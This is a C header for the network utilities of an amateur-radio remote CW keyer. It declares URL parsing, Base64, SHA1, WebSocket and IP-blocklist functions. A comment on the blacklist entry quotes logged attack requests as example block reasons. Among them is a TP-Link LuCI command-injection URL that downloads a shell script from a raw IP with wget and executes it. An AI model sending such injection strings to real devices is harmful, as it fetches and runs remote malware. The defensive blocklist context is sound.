/*------------------------------------------------------------------*/
/* File: C:\cbproj\Remote_CW_Keyer\Inet_Tools.c                     */
/*                                                                  */
/* Autor: Wolfgang Buescher (DL4YHF)                                */
/*                                                                  */
/* Revision history (YYYY-MM-DD):      See *.c  !                   */
/*                                                                  */
/*------------------------------------------------------------------*/

#ifndef _INET_TOOLS_H
#define _INET_TOOLS_H


#define INET_MAX_URL_LENGTH 511 /* characters */

// Possible values for XYZ.iProtocol :
#define INET_PROTOCOL_UNKNOWN  0  /* also used as dummy to turn a server OFF (e.g. AudioStreamServer_GUI.cpp) */
#define INET_PROTOCOL_OFF      0
#define INET_PROTOCOL_HTTP     1
#define INET_PROTOCOL_HTTPS    2
#define INET_PROTOCOL_FTP      3
#define INET_PROTOCOL_MAILTO   4
#define INET_PROTOCOL_RSVD_5   5
#define INET_PROTOCOL_RAW      6  /* dummy for "tcp://" or "rawtcp://ip:port" (used for pseudo audio stream addresses) */
#define INET_PROTOCOL_TCP      7
#define INET_PROTOCOL_UDP      8
#define INET_PROTOCOL_FILE     9  /* dummy for "local files" */
#define INET_PROTOCOL_COM_PORT 10 /* dummy for "COM port", recognized by INET_ParseProtocolHostnameAndPort() */
   // (Remember.. in Unix, "everything is a file", or may be treated as such.
   //  In Windows, a socket is a socket, a COM port is a COM port,
   //              and a file handle is a file handle.)
   // Note: When adding new INET_PROTOCOL_-values above, also add a short but unique
   //       string for them in INET_InetProtocolToString() .

#ifndef  WSAE_NO_ERROR // our own addition to the (windows-)Socket Error Codes..
# define WSAE_NO_ERROR 0  // ... used by a few wrapper functions, not Winsock itself
#endif


#ifndef CPROT  // For peaceful co-existence of "C" and "C++" ....
#  ifdef __cplusplus
#    define CPROT extern "C"
#  else
#    define CPROT
#  endif  /* ! "cplusplus" */
#endif

//---------------------------------------------------------------------------
// Data types and structures
//---------------------------------------------------------------------------

typedef struct tInetUrlParts
{
  char *pszAccess; // usually the NETWORK PROTOCOL, now known as "scheme", W3C calls it "access".
                 // (heck, why do geeks have to use so many different names for the SAME THING ?)
  char *pszHost;   // Something like "qsl.net", but may also be something like "192.168.0.222" !
  char *pszAbsolute;  // "absolute" part of URL.  Mutually exclusive with "relative".
  char *pszRelative;  // "relative" part of URL.  Mutually exclusive with "absolute".
  char *pszFragment;

  // Derived info (also set in INET_SplitURL, but not in the original code) :
  int    iProtocol; // may contain 0=unknown, or INET_PROTOCOL_HTTP, etc .
  int    iPort;     // port NUMBER (0=not explicitly set in INET_SplitURL)

} T_INET_UrlParts;

typedef struct tInetSha1Context
{ unsigned long state[5];
  unsigned long count[2];
  unsigned char buffer[64];
} T_INET_SHA1_Context;


typedef struct t_InetBlacklistEntry
{ union
   { DWORD dw;
     BYTE  b[4];
   } b4HisIP;
  char  sz59Reason[60];  // reason for being blacklisted,
        // e.g. "GET /solr/admin/info/system?wt=json" ,
        //      "GET /?XDEBUG_SESSION_START=phpstorm" ,
        //      "GET /console/"                       ,
        //      "GET /_ignition/execute-solution"     ,
        //      "GET /actuator/gateway/routes"        ,
        //      "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0=",
        //      "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh)"
        //
} T_InetBlacklistEntry;

typedef struct t_InetBlacklist
{
# define INET_MAX_BLOCKED_IP_ADDRESSES 1024
  T_InetBlacklistEntry sBlockedIPs[INET_MAX_BLOCKED_IP_ADDRESSES];
} T_InetBlacklist;


//---------------------------------------------------------------------------
// Function prototypes   (more details in the implementation; *.c)
//---------------------------------------------------------------------------

//---------------------------------------------------------------------------
CPROT int INET_Init(void); // -> return value : >= 0 when ok, < 0 indicates an error.

CPROT int INET_EncodeBase64( BYTE *pbSrc, int iSrcLen, BYTE *pbDst, int iMaxDstLen, int iMaxCharsPerLine );
CPROT int INET_DecodeBase64( BYTE *pbSrc, int iSrcLen, BYTE *pbDst, int iMaxDstLen);

CPROT void INET_SHA1_Init(  T_INET_SHA1_Context* context);
CPROT void INET_SHA1_Update(T_INET_SHA1_Context* context, unsigned char* data, unsigned int len);
CPROT void INET_SHA1_Final( T_INET_SHA1_Context* context, unsigned char digest[20]);

CPROT BOOL INET_WebSecSocketKeyToWebSocketAcceptValue( // generate value for "Sec-Websocket-Accept"
         char *pszSecWebSocketKey,       // [in]  value from field "Sec-Websocket-Key"
         char *cpDestSecWebSocketAccept, // [out] value for "Sec-Websocket-Accept"
         char *cpDestEndstop );          // [in] endstop for the destination (max. position of the string's trailing zero)

CPROT int INET_UrlEncodingToPlainText( const char * pszUrlEncodedSource,
        char **ppszDestPlainText,
        const char *pszDestEndstop, const char *pszDelimiters );


CPROT int INET_PlainTextToUrlEncoding( const char *pszPlainTextSource,
           char **ppszDestUrlEncoded, const char *pszDestEndstop,
           const char *pszDelimiters );
CPROT BOOL INET_ParseKeyAndValueFromQueryString( const char **ppszSrc,
           char *pszKey, int iMaxKeyLen,

           char *pszVal, int iMaxValLen);




//---------------------------------------------------------------------------
CPROT BOOL INET_IsInternetResource( const char *pszFilenameOrURL ); // e.g. "begins with http:// or www., etc"
CPROT int  INET_ReplaceCharInPath( char *pszFilenameOrURL, int iMaxLen, char cOriginal, char cReplacement );
CPROT int  INET_ParseProtocolHostnameAndPort( const char *pszFilenameOrURL, int *piProtocol,
                   char *psz80HostName, int *piPortNumber, int iParserOptions);
#     define INET_PARSER_OPTION_NORMAL 0 // iParserOptions = 0 = "normal" : only accept "complete URLs"
#     define INET_PARSER_OPTION_ALLOW_INCOMPLETE_URL 1 // see example in the implementation of INET_ParseProtocolHostnameAndPort() !

CPROT char *INET_InetProtocolToString( int iInetProtocol );

//---------------------------------------------------------------------------
CPROT WORD  INET_GetU16FromBE( BYTE **ppbSource ); // get 16 bit from "BE" = BIG ENDIAN, convert to host byte order, and skip two bytes
CPROT DWORD INET_GetU32FromBE( BYTE **ppbSource ); // get 32 bit from "BE" = BIG ENDIAN, convert to host byte order, and skip four bytes
CPROT WORD  INET_GetU16FromLE( BYTE **ppbSource ); // get 16 bit from "LE" = LITTLE ENDIAN, convert to host byte order, and skip two bytes
CPROT DWORD INET_GetU32FromLE( BYTE **ppbSource ); // get 32 bit from "LE" = LITTLE ENDIAN, convert to host byte order, and skip four bytes
              // (doesn't crash on any CPU, even if *ppbSource or *ppbDest points to an ODD address)
CPROT void  INET_AppendU16AsBE( BYTE **ppbDest, WORD  wData ); // append 16 bit as "BE" = BIG ENDIAN, and increment dest pointer by two bytes
CPROT void  INET_AppendU32AsBE( BYTE **ppbDest, DWORD dwData); // append 32 bit as "BE" = BIG ENDIAN, and increment dest pointer by four bytes
CPROT void  INET_AppendU16AsLE( BYTE **ppbDest, WORD  wDatat ); // append 16 bit as "LE" = LITTLE ENDIAN, and increment dest pointer by two bytes
CPROT void  INET_AppendU32AsLE( BYTE **ppbDest, DWORD dwData ); // append 32 bit as "LE" = LITTLE ENDIAN, and increment dest pointer by four bytes
CPROT void  INET_AppendByte( BYTE **ppbDest, BYTE *pbEndstop, BYTE bValue );
CPROT void  INET_AppendBlock(BYTE **ppbDest, BYTE *pbEndstop, BYTE *pbSource, int nBytes );

CPROT void  INET_DumpTraffic_HexOrASCII( char *pszDest, int iMaxLen, BYTE *pbData, int nBytesToDump );

CPROT void  INET_BlockIPv4Address( T_InetBlacklist *pBlacklist, BYTE *pbIPv4Address, char *pszWhy);
CPROT BOOL  INET_IsBlockedIPv4Address( T_InetBlacklist *pBlacklist, BYTE *pbIPv4Address );
CPROT char* INET_WinsockErrorCodeToString( int iWSAErrorCode );
CPROT BOOL  INET_LookupDomainOrParseIP( const char *pszUrlOrNumericIP, BYTE *pbIPv4Address, int *piPort);
CPROT long  INET_GetSocketLocalPort( SOCKET s ); //  ... aka 'ephemeral' port number, chosen by the network stack




#endif // ndef YHF_INET_H ?

/* EOF < Inet_Tools.h > */
